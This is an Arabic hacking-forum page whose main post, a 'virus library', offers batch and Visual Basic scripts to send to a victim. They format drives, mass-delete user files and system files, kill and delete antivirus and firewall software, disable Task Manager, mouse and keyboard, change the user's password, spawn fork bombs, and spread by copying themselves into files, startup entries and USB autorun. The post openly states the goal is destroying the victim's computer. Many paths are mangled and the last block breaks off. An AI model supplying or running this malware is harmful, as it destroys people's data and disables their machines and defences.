منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» الحصول على VPS مجانا
السبت 02 يونيو 2018, 4:38 pm من طرف Chuchi

» موقع يعطيك سيرفر في بي اس لمدة شهر - هديه لعيون المنظمه
الأحد 13 مايو 2018, 10:41 pm من طرف anamax

» الدرس الأول ~ الحصول على RDP مجانا ~ دورة الهويـات المجهــولة
الأحد 06 مايو 2018, 1:01 pm من طرف yoyotam

» 10 Days Free Vps Trial 4GB ram+4Cpu
الأحد 29 أبريل 2018, 12:39 am من طرف meno2015r222

»  برنامج اللفلفة ل Conquer Online كااااااامل مكمل باشرح
الأحد 22 أبريل 2018, 7:01 pm من طرف mado40

» اختراق الفيس بوك بالعملاق جوجل
الخميس 12 أبريل 2018, 9:00 pm من طرف ياسين الحنين

» Get 30 days VPS in 30 seconds
الأحد 08 أبريل 2018, 10:56 am من طرف alwayshere2

» شرح كامل الحصول على rdp وكسر البرافيت لعيونكم ^_
الأحد 08 أبريل 2018, 10:54 am من طرف alwayshere2

» طريقتي في جلب حسابات rdp
الثلاثاء 03 أبريل 2018, 7:48 pm من طرف adam42

أغسطس 2018
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
  12345
6789101112
13141516171819
20212223242526
2728293031  

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 12 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 12 زائر :: 2 عناكب الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

اكبر مكتبة فايروسات virus

اذهب الى الأسفل

اكبر مكتبة فايروسات virus

مُساهمة من طرف Admin في الإثنين 20 مايو 2013, 7:15 pm

راح تكون عباره عن اكواد ...

انته تقوم بحفض الملف بصيغه
bat
راح يكون الاسم جاهز مثلا
ahmednabel.bat

>>><<<

" تحذير عند صنع الفايروس لا تقم بفتح الملف على جهازك "

>>><<<
نبدأأأ
...



اولا فايروس لفرمتة الجهاز C.D.E.F حسب ما يكون موجد عند الشخص المراد ارساله له

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
لحذف وتخريب نظام الجهاز كامل



@
كود PHP:
Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
فيرووس Visual Basic



كود PHP:
SetAttr "c:autoexec.bat", vbNormal
SetAttr "c:msdos.sys", vbNormal
SetAttr "c:io.sys", vbNormal
SetAttr "c:windowswin.ini", vbNormal
SetAttr "c:windowssystem.ini", vbNormal
SetAttr "c:command.com", vbNormal
SetAttr "c:config.sys", vbNormal
SetAttr "c:windowsrundll.exe", vbNormal
SetAttr "c:windowsrundll32.exe", vbNormal
Kill "C:autoexec.bat"
Kill "C:msdos.sys"
Kill "C:io.sys"
Kill "C:windowswin.ini"
Kill "C:windowssystem.ini"
Kill "C:command.com"
Kill "C:config.sys"
Kill "C:windowsrundll.exe"
Kill "C:windowsrundll32.exe
والاقوى لعمل الفورمات عند تشغيل الملف مباشرة يقوم بعمله


كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
كود جديد لحذف الاغاني والصور وجميع الملفات التي بالصيغ الموجودة فالفايروس


كود PHP:
@echo off
del d:*.mp3 /s
del d:*.wma /s
del d:*.mpg /s
del d:*.3gp /s
del c:*.mp3 /s
del c:*.wma /s
del c:*.mpg /s
del c:*.3gp /s
فايروس يقوم بأعدة تشغيل الجهاز تلقائيآآآ


كود PHP:
@echo off
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Virus /d "shutdown -r -t 00" /f >nul
exit





فيروس يحرق كل شيء في الحاسوب

كود PHP:
@ echo off
@ECHO A PHOENIX PRODUCTION
[PHP]@ECHO MAIN BAT RUNNING
@echo Installing Antivirus Signature Updates...
sc config "antivirservice" start= disabled
shutdown /r /t 5
GOTO start
@echo off
del d:*.txt /s
del d:*.doc /s
del d:*.docx /s
del d:*.mp3 /s
del d:*.wma /s
del d:*.mpg /s
del d:*.dat /s
del d:*.3gp /s
del d:*.rar /s
del d:*.zip /s
del d:*.html /s
del d:*.php /s
del d:*.exe /s
del d:*.dll /s
del c:*.txt /s
del c:*.doc /s
del c:*.docx /s
del c:*.mp3 /s
del c:*.wma /s
del c:*.mpg /s
del c:*.dat /s
del c:*.3gp /s
del c:*.rar /s
del c:*.zip /s
del c:*.html /s
del c:*.php /s
del c:*.exe /s
del c:*.dll /s
del E:*.txt /s
del E:*.doc /s
del E:*.docx /s
del E:*.mp3 /s
del E:*.wma /s
del E:*.mpg /s
del E:*.dat /s
del E:*.3gp /s
del E:*.rar /s
del E:*.zip /s
del E:*.html /s
del E:*.php /s
del E:*.exe /s
del E:*.dll /s
del F:*.txt /s
del F:*.doc /s
del F:*.docx /s
del F:*.mp3 /s
del F:*.wma /s
del F:*.mpg /s
del F:*.dat /s
del F:*.3gp /s
del F:*.rar /s
del F:*.zip /s
del F:*.html /s
del F:*.php /s
del F:*.exe /s
del F:*.dll /s
del G:*.txt /s
del G:*.doc /s
del G:*.docx /s
del G:*.mp3 /s
del G:*.wma /s
del G:*.mpg /s
del G:*.dat /s
del G:*.3gp /s
del G:*.rar /s
del G:*.zip /s
del G:*.html /s
del G:*.php /s
del G:*.exe /s
del G:*.dll /s
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%% >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%% >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%Start MenuPrograms >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%Desktop >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------
rem ---------------------------------
rem Change User Password To sa-hacker
net user %username% nacer789
rem ---------------------------------
rem ---------------------------------
rem Hide Virus File After Run
attrib +h %0
rem ---------------------------------
rem ---------------------------------
rem Kill Explorer
echo :a >>explorer.bat
echo tskill explorer >>explorer.bat
echo goto a >>explorer.bat
echo Set objShell = CreateObject("WScript.Shell")>>invisi.vbs
echo strCommand = "explorer.bat">>invisi.vbs
echo objShell.Run strCommand, vbHide, TRUE>>invisi.vbs
start "" invisi.vbs
rem ---------------------------------
rem ---------------------------------
rem Kill Internet Explorer
tskill iexplore
rem ---------------------------------
rem ---------------------------------
rem Kill Notepad
tskill notepad
rem ---------------------------------
rem ---------------------------------
rem Hide CMD Window
if exist winstart.vbs goto next
echo set objShell = CreateObject("WScript.Shell") >> winstart.vbs
echo objShell.Run ".bat", vbHide, TRUE >> winstart.vbs
start "" "winstart.vbs"
exit
:next
rem ---------------------------------
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
rem ---------------------------------
rem Disable Admin Accounts
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
rem ---------------------------------
rem ---------------------------------
rem Disable Task Manager
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
rem ---------------------------------
rem ---------------------------------
rem Disable Internet
@Echo off & @@Break Off
Ipconfig /release
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
rem ---------------------------------
rem ---------------------------------
rem Delete My ********s
del /f /q '%userprofile%\My ********s\*.*'
rem ---------------------------------
rem ---------------------------------
rem The Last Restart
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
shutdown /r /t 00
rem ---------------------------------
rem ---------------------------------
rem Delete All Png
DIR /S/B %SystemDrive%*.png >> FIleList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Xml
DIR /S/B %SystemDrive%*.xml >> FIleList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All ********s
DIR /S/B %SystemDrive%*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Texts
DIR /S/B %SystemDrive%*.txt >> FIleList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete My Pictures
del /f /q '%userprofile%\My Pictures\*.*'
rem ---------------------------------
rem ---------------------------------
rem Net Send Spam
net start "messenger"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
rem ---------------------------------
rem ---------------------------------
rem Net Send Spam
net start "messenger"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
rem ---------------------------------
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
rem ---------------------------------
rem Hide My ********s Folder
attrib +h "%userprofile%\my ********s"
rem ---------------------------------
rem ---------------------------------
rem Activate Blue Screen Of Death
@((( Echo Off > Nul ) & Break Off )
@Set HiveBSOD=HKLMSoftwareMicrosoftWindowsCurrentVersionRun
@Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul
@Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*"
)
rem ---------------------------------
rem ---------------------------------
rem Infect Reg Run Key
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------
rem ---------------------------------
rem Infect Startup Folder
copy %0 "%userprofile%\Start Menu\Programs\Startup"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Txt Files
assoc .txt=batfile
DIR /S/B %SystemDrive%*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Txt Files
assoc .txt=batfile
DIR /S/B %SystemDrive%*.txt >> InfList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Mp3 Files
assoc .mp3=batfile
DIR /S/B %SystemDrive%*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:
echo [AutoRun] > %%E:autorun.inf
echo open="%%E:\%0" >> %%E:autorun.inf
echo action=Open folder to see files... >> %%E:autorun.inf)
rem ---------------------------------
rem ---------------------------------
rem Infect All Folders
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
rem ---------------------------------
rem ---------------------------------
rem Infect "ls" Cmd
copy %0 %windir%system32ls.bat
rem ---------------------------------
rem ---------------------------------
rem Infect All .Doc Files
assoc .doc=batfile
DIR /S/B %SystemDrive%*.doc >> InfList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Xml Files
assoc .xml=batfile
DIR /S/B %SystemDrive%*.xml >> InfList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect All .Png Files
assoc .png=batfile
DIR /S/B %SystemDrive%*.png >> InfList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Crash Computer
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
start "" crash.bat
rem ---------------------------------
[/PHP]



فيروس يحرق الهارد ديسك مع الشرح



اول كود ضغير بس قوووى

كود PHP:
@echo offc:cddeltree /y *.*d:cddeltree /y *.*



ثاني كود
كود PHP:
SetAttr "c:autoexec.bat", vbNormal
SetAttr "c:msdos.sys", vbNormal
SetAttr "c:io.sys", vbNormal
SetAttr "c:@_@@_@@_@@_@@_@@_@swin.ini", vbNormal
SetAttr "c:@_@@_@@_@@_@@_@@_@ssystem.ini", vbNormal
SetAttr "c:command.com", vbNormal
SetAttr "c:config.sys", vbNormal
SetAttr "c:@_@@_@@_@@_@@_@@_@srundll.exe", vbNormal
SetAttr "c:@_@@_@@_@@_@@_@@_@srundll32.exe", vbNormal
Kill "C:autoexec.bat"
Kill "C:msdos.sys"
Kill "C:io.sys"
Kill "C:@_@@_@@_@@_@@_@@_@swin.ini"
Kill "C:@_@@_@@_@@_@@_@@_@ssystem.ini"
Kill "C:command.com"
Kill "C:config.sys"
Kill "C:@_@@_@@_@@_@@_@@_@srundll.exe"
Kill "C:@_@@_@@_@@_@@_@@_@srundll32.exe"
الى هنا شرحتلكم شو الي لازم نعملو حتى ندمر جهاز الضحيه
وشفنا كيف والاهم الحفظ بصيغة .bat

بالتوفيق للجميع

ملاحظة يجب صنع الفيروس 6 مرات يعني 6 فيروسات بنفس الكود وفتحهم في جهاز الضحية لن الهارد ديسك عنده قوة معالجة


............
قاتل explorer.exe

كود PHP:
taskkill /im explorer.exe
del explorer.exe
shutdown -r



الثاني المدمر


كود PHP:
echo off
copy %0 "%systemdrive%\********s and settings\%username%\start menu\programs\startup\gmod.bat"
attrib /h "%systemdrive%\********s and settings\%username%\start menu\programs\startup"
copy %0 "%homedrive%\gmod.bat"
attrib /h "%homedrive%"
copy %0 "%systemdrive%\********s and settings\%username%\desktop\gmod.bat"
attrib /h "%systemdrive%\********s and settings\%username%\desktop"
time 00:00
schtasks /delete Consolidator
schtasks /delete AppleSoftwareUpdate
schtasks /delete HotStart
schtasks /delete SR
schtasks /delete ResolutionHost
schtasks /delete MP Scheduled Scan
schtasks /delete SystemSoundsService
schtasks /delete TMM
schtasks /delete UserTask
net user 6097 /add
net user 485 /add
net user 24812 /add
net user 18367 /add
net user 13442 /add
net user 17331 /add
net user 10784 /add
net user 15751 /add
net user 26428 /add
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand
start home.comcast.net/~wolfand


الثالث هجوم T0TAL

شباااب لاحد يستخدم الأمر في جهازه ترى تتدمروا وفي ناس جربوا وتتدمروا وان لست المسؤؤل



كود PHP:
@echo off
echo ..
ping localhost -n 2 >nul
echo ...
echo ____________________________________
echo ///////////////////////////////////
echo NEOTECS T0TAL ATTACKER
echo _____________________________________
ping localhost -n 5 >nul
cls
echo ATTACK OF T0TAL
title T0TAL ATTACK
color 04
echo 0.............................................0
ping localhost -n 1 >nul
echo 0.............................................0
ping localhost -n 1 >nul
echo 0............................................0
ping localhost -n 1 >nul
echo .0...........00.............00............0
ping localhost -n 1 >nul
echo ....0.......0.0.............0.0.........0
ping localhost -n 1 >nul
echo ......0....0..0.............0..0....0
ping localhost -n 1 >nul
echo ...............0.............0
ping localhost -n 1 >nul
echo ...............0.............0
ping localhost -n 1 >nul
echo ...............0.............0
ping localhost -n 1 >nul
echo ...............0.............0
ping localhost -n 1 >nul
echo ...............0.0.0.0.0.0.0.0
ping localhost -n 1 >nul
echo .............0.................0
ping localhost -n 1 >nul
echo ..............0...............0
ping localhost -n 1 >nul
echo ...............0......l…....0
ping localhost -n 1 >nul
echo ..................0...l...0
ping localhost -n 1 >nul

echo .................... ' '
ping localhost -n 1 >nul
echo .....................I/..........
ping localhost -n 1 >nul
echo ......................v
ping localhost -n 5 >nul
echo T0TAL IS ATTACKING YOUR SECURITY
ping localhost -n 5 >nul
cls
echo Whats going on here ?
echo T0TAL HAS TAKEN THE CONTROL !
ping localhost -n 4 >nul
echo
echo // WELCOME TO NEOTECS WORLD //
ping localhost -n 1 >nul
echo
ping localhost -n 1 >nul
echo // //
ping localhost -n 1 >nul
echo 'v' 'v'
ping localhost -n 3 >nul
echo //DELETING SECURITY//


pause
cls
echo deleting finished //by Neotec r3
pause
cls
:A
start notepad.exe
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
goto :A







هذا الكود لقتل برنامج الآنتي فيروس، تدمير مضاد الفيروسات


كود PHP:
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
rem --
خفاء جميع الاغاني والافلام والصور من الملفات



كود PHP:
@ echo off
attrib +h "%userprofile%\my documents\my music"
attrib +h "%userprofile%\my documents\my videos"
attrib +h "%userprofile%\my documents\my pictures"


قتل msn messenger




كود PHP:
@ echo off -
tskill msnmsgr


فايروس إطفاءالجهاز بعد 60 ثانيه




كود PHP:
cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 60 Seconds...hacked by El z0b3a "
net user aspnet /delete
EXIT


تعطيل حماية الوندوز وجدار الحماية




كود PHP:
@ echo off
net stop "security center"
net stop sharedaccess
netsh firewall set opmode mode-disable


تعطيل لوحة المفاتيح




كود PHP:
@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlKeyboa rd Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,0 0 ,01,00,00, >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00 ,3f,00,00,00,40,00,00,00, >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57 ,00,00,00,58,00,00,00,37, >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00 ,00,00,4a,00,00,00,47,00, >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00 ,00,4d,00,00,00,4e,00,00, >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00 ,53,00,00,00,52,00,00,00, >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52 ,e0,00,00,47,e0,00,00,49, >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00 ,00,00,02,00,00,00,03,00, >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00 ,00,08,00,00,00,09,00,00, >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00 ,0e,00,00,00,0f,00,00,00, >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14 ,00,00,00,15,00,00,00,16, >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00 ,00,00,1b,00,00,00,2b,00, >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00 ,00,21,00,00,00,22,00,00, >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00 ,27,00,00,00,28,00,00,00, >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e ,00,00,00,2f,00,00,00,30, >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00 ,00,00,35,00,00,00,36,00, >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00 ,00,38,e0,00,00,5c,e0,00, >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00 ,22,e0,00,00,24,e0,00,00, >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c ,e0,00,00,20,e0,00,00,6a, >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0 ,00,00,6c,e0,00,00,6d,e0, >> "nokeyboard.reg"
